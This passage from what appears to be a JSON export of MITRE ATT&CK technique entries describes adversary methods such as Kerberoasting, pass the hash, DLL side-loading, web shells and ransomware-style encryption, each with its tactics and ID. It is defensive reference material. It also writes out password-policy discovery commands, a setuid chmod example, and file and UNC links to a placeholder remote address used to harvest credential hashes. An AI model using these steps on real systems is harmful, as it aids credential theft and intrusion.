presence.\n\nDefault accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)\n\nThe overlap of account access, credentials, and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)","tactics":["defense-evasion","persistence","privilege-escalation","initial-access"],"externalId":"T1078","externalUrl":"https://attack.mitre.org/techniques/T1078"},"key":"mitre/valid-accounts"},{"type":"mitre","subtype":"technique","metadata":{"technique":"DLL Side-Loading","version":"1.0","description":"Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)\n\nAdversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.","tactics":["defense-evasion"],"externalId":"T1073","externalUrl":"https://attack.mitre.org/techniques/T1073"},"key":"mitre/dll-side-loading"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exploitation for Privilege Escalation","version":"1.0","description":"Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform Privilege Escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.","tactics":["privilege-escalation"],"externalId":"T1068","externalUrl":"https://attack.mitre.org/techniques/T1068"},"key":"mitre/exploitation-for-privilege-escalation"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Kerberoasting","version":"1.0","description":"Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable Persistence, Privilege Escalation, and  Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)","tactics":["credential-access"],"externalId":"T1208","externalUrl":"https://attack.mitre.org/techniques/T1208"},"key":"mitre/kerberoasting"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Obfuscated Files or Information","version":"1.0","description":"Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)","tactics":["defense-evasion"],"externalId":"T1027","externalUrl":"https://attack.mitre.org/techniques/T1027"},"key":"mitre/obfuscated-files-or-information"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Trap","version":"1.0","description":"The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common  keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.","tactics":["execution","persistence"],"externalId":"T1154","externalUrl":"https://attack.mitre.org/techniques/T1154"},"key":"mitre/trap"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Password Policy Discovery","version":"1.0","description":"Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). An adversary may attempt to access detailed information about the password policy used within an enterprise network. This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems. (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)\n\n### Windows\n* net accounts\n* net accounts /domain\n\n### Linux\n* chage -l \n* cat /etc/pam.d/common-password\n\n### macOS\n* pwpolicy getaccountpolicies","tactics":["discovery"],"externalId":"T1201","externalUrl":"https://attack.mitre.org/techniques/T1201"},"key":"mitre/password-policy-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Forced Authentication","version":"1.0","description":"The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. Web Distributed Authoring and Versioning (WebDAV) is typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information including the user's hashed credentials over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials, or reuse it for [Pass the Hash](https://attack.mitre.org/techniques/T1075). (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)","tactics":["credential-access"],"externalId":"T1187","externalUrl":"https://attack.mitre.org/techniques/T1187"},"key":"mitre/forced-authentication"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data Encrypted for Impact","version":"1.0","description":"Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)","tactics":["impact"],"externalId":"T1486","externalUrl":"https://attack.mitre.org/techniques/T1486"},"key":"mitre/data-encrypted-for-impact"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Disk Content Wipe","version":"1.0","description":"Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)","tactics":["impact"],"externalId":"T1488","externalUrl":"https://attack.mitre.org/techniques/T1488"},"key":"mitre/disk-content-wipe"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Password Filter DLL","version":"1.0","description":"Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.\n\nBefore registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.\n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)","tactics":["credential-access"],"externalId":"T1174","externalUrl":"https://attack.mitre.org/techniques/T1174"},"key":"mitre/password-filter-dll"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data Compressed","version":"1.0","description":"An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.","tactics":["exfiltration"],"externalId":"T1002","externalUrl":"https://attack.mitre.org/techniques/T1002"},"key":"mitre/data-compressed"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Credentials in Files","version":"1.0","description":"Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)","tactics":["credential-access"],"externalId":"T1081","externalUrl":"https://attack.mitre.org/techniques/T1081"},"key":"mitre/credentials-in-files"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Netsh Helper DLL","version":"1.0","description":"Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)\n\nProof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)","tactics":["persistence"],"externalId":"T1128","externalUrl":"https://attack.mitre.org/techniques/T1128"},"key":"mitre/netsh-helper-dll"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Input Capture","version":"1.0","description":"Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)\n\nKeylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.\n\nAdversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)","tactics":["collection","credential-access"],"externalId":"T1056","externalUrl":"https://attack.mitre.org/techniques/T1056"},"key":"mitre/input-capture"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exploitation for Client Execution","version":"1.0","description":"Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1192). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.","tactics":["execution"],"externalId":"T1203","externalUrl":"https://attack.mitre.org/techniques/T1203"},"key":"mitre/exploitation-for-client-execution"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Local Job Scheduling","version":"1.0","description":"On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).\n\n### cron\n\nSystem-wide cron jobs are installed by modifying /etc/crontab file, /etc/cron.d/ directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.\n\nThose methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.\n\n### at\n\nThe at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.\n\n### launchd\n\nEach launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called StartCalendarInterval with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.","tactics":["persistence","execution"],"externalId":"T1168","externalUrl":"https://attack.mitre.org/techniques/T1168"},"key":"mitre/local-job-scheduling"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Setuid and Setgid","version":"1.0","description":"When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively  (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\n\nAn adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future  (Citation: OSX Keydnap malware).","tactics":["privilege-escalation","persistence"],"externalId":"T1166","externalUrl":"https://attack.mitre.org/techniques/T1166"},"key":"mitre/setuid-and-setgid"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Web Shell","version":"1.0","description":"A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)\n\nWeb shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.","tactics":["persistence","privilege-escalation"],"externalId":"T1100","externalUrl":"https://attack.mitre.org/techniques/T1100"},"key":"mitre/web-shell"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Process Doppelgänging","version":"1.0","description":"Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.","tactics":["defense-evasion"],"externalId":"T1186","externalUrl":"https://attack.mitre.org/techniques/T1186"},"key":"mitre/process-doppelg-nging"},{"type":"mitre","subtype":"technique","metadata":{"technique":"SSH Hijacking","version":"1.0","description":"Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).","tactics":["lateral-movement"],"externalId":"T1184","externalUrl":"https://attack.mitre.org/techniques/T1184"},"key":"mitre/ssh-hijacking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Standard Non-Application Layer Protocol","version":"1.0","description":"Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.","tactics":["command-and-control"],"externalId":"T1095","externalUrl":"https://attack.mitre.org/techniques/T1095"},"key":"mitre/standard-non-application-layer-protocol"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Pass the Hash","version":"1.0","description":"Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. \n\nWindows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)","tactics":["lateral-movement"],"externalId":"T1075","externalUrl":"https://attack.mitre.org/techniques/T1075"},"key":"mitre/pass-the-hash"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Query Registry","version":"1.0","description":"Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.","tactics":["discovery"],"externalId":"T1012","externalUrl":"https://attack.mitre.org/techniques/T1012"},"key":"mitre/query-registry"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data Transfer Size Limits","version":"1.0","description":"An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.","tactics":["exfiltration"],"externalId":"T1030","externalUrl":"https://attack.mitre.org/techniques/T1030"},"key":"mitre/data-transfer-size-limits"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Windows Remote Management","version":"1.0","description":"Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)","tactics":["execution","lateral-movement"],"externalId":"T1028","externalUrl":"https://attack.mitre.org/techniques/T1028"},"key":"mitre/windows-remote-management"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Path Interception","version":"1.0","description":"Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)\n\nThere are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.\n\n### Unquoted Paths\nService paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)\n\n### PATH Environment Variable Misconfiguration\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.\n\n### Search Order Hijacking\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).","tactics":["persistence","privilege-escalation"],"externalId":"T1034","externalUrl":"https://attack.mitre.org/techniques/T1034"},"key":"mitre/path-interception"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Endpoint Denial of Service","version":"1.0","description":"Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various 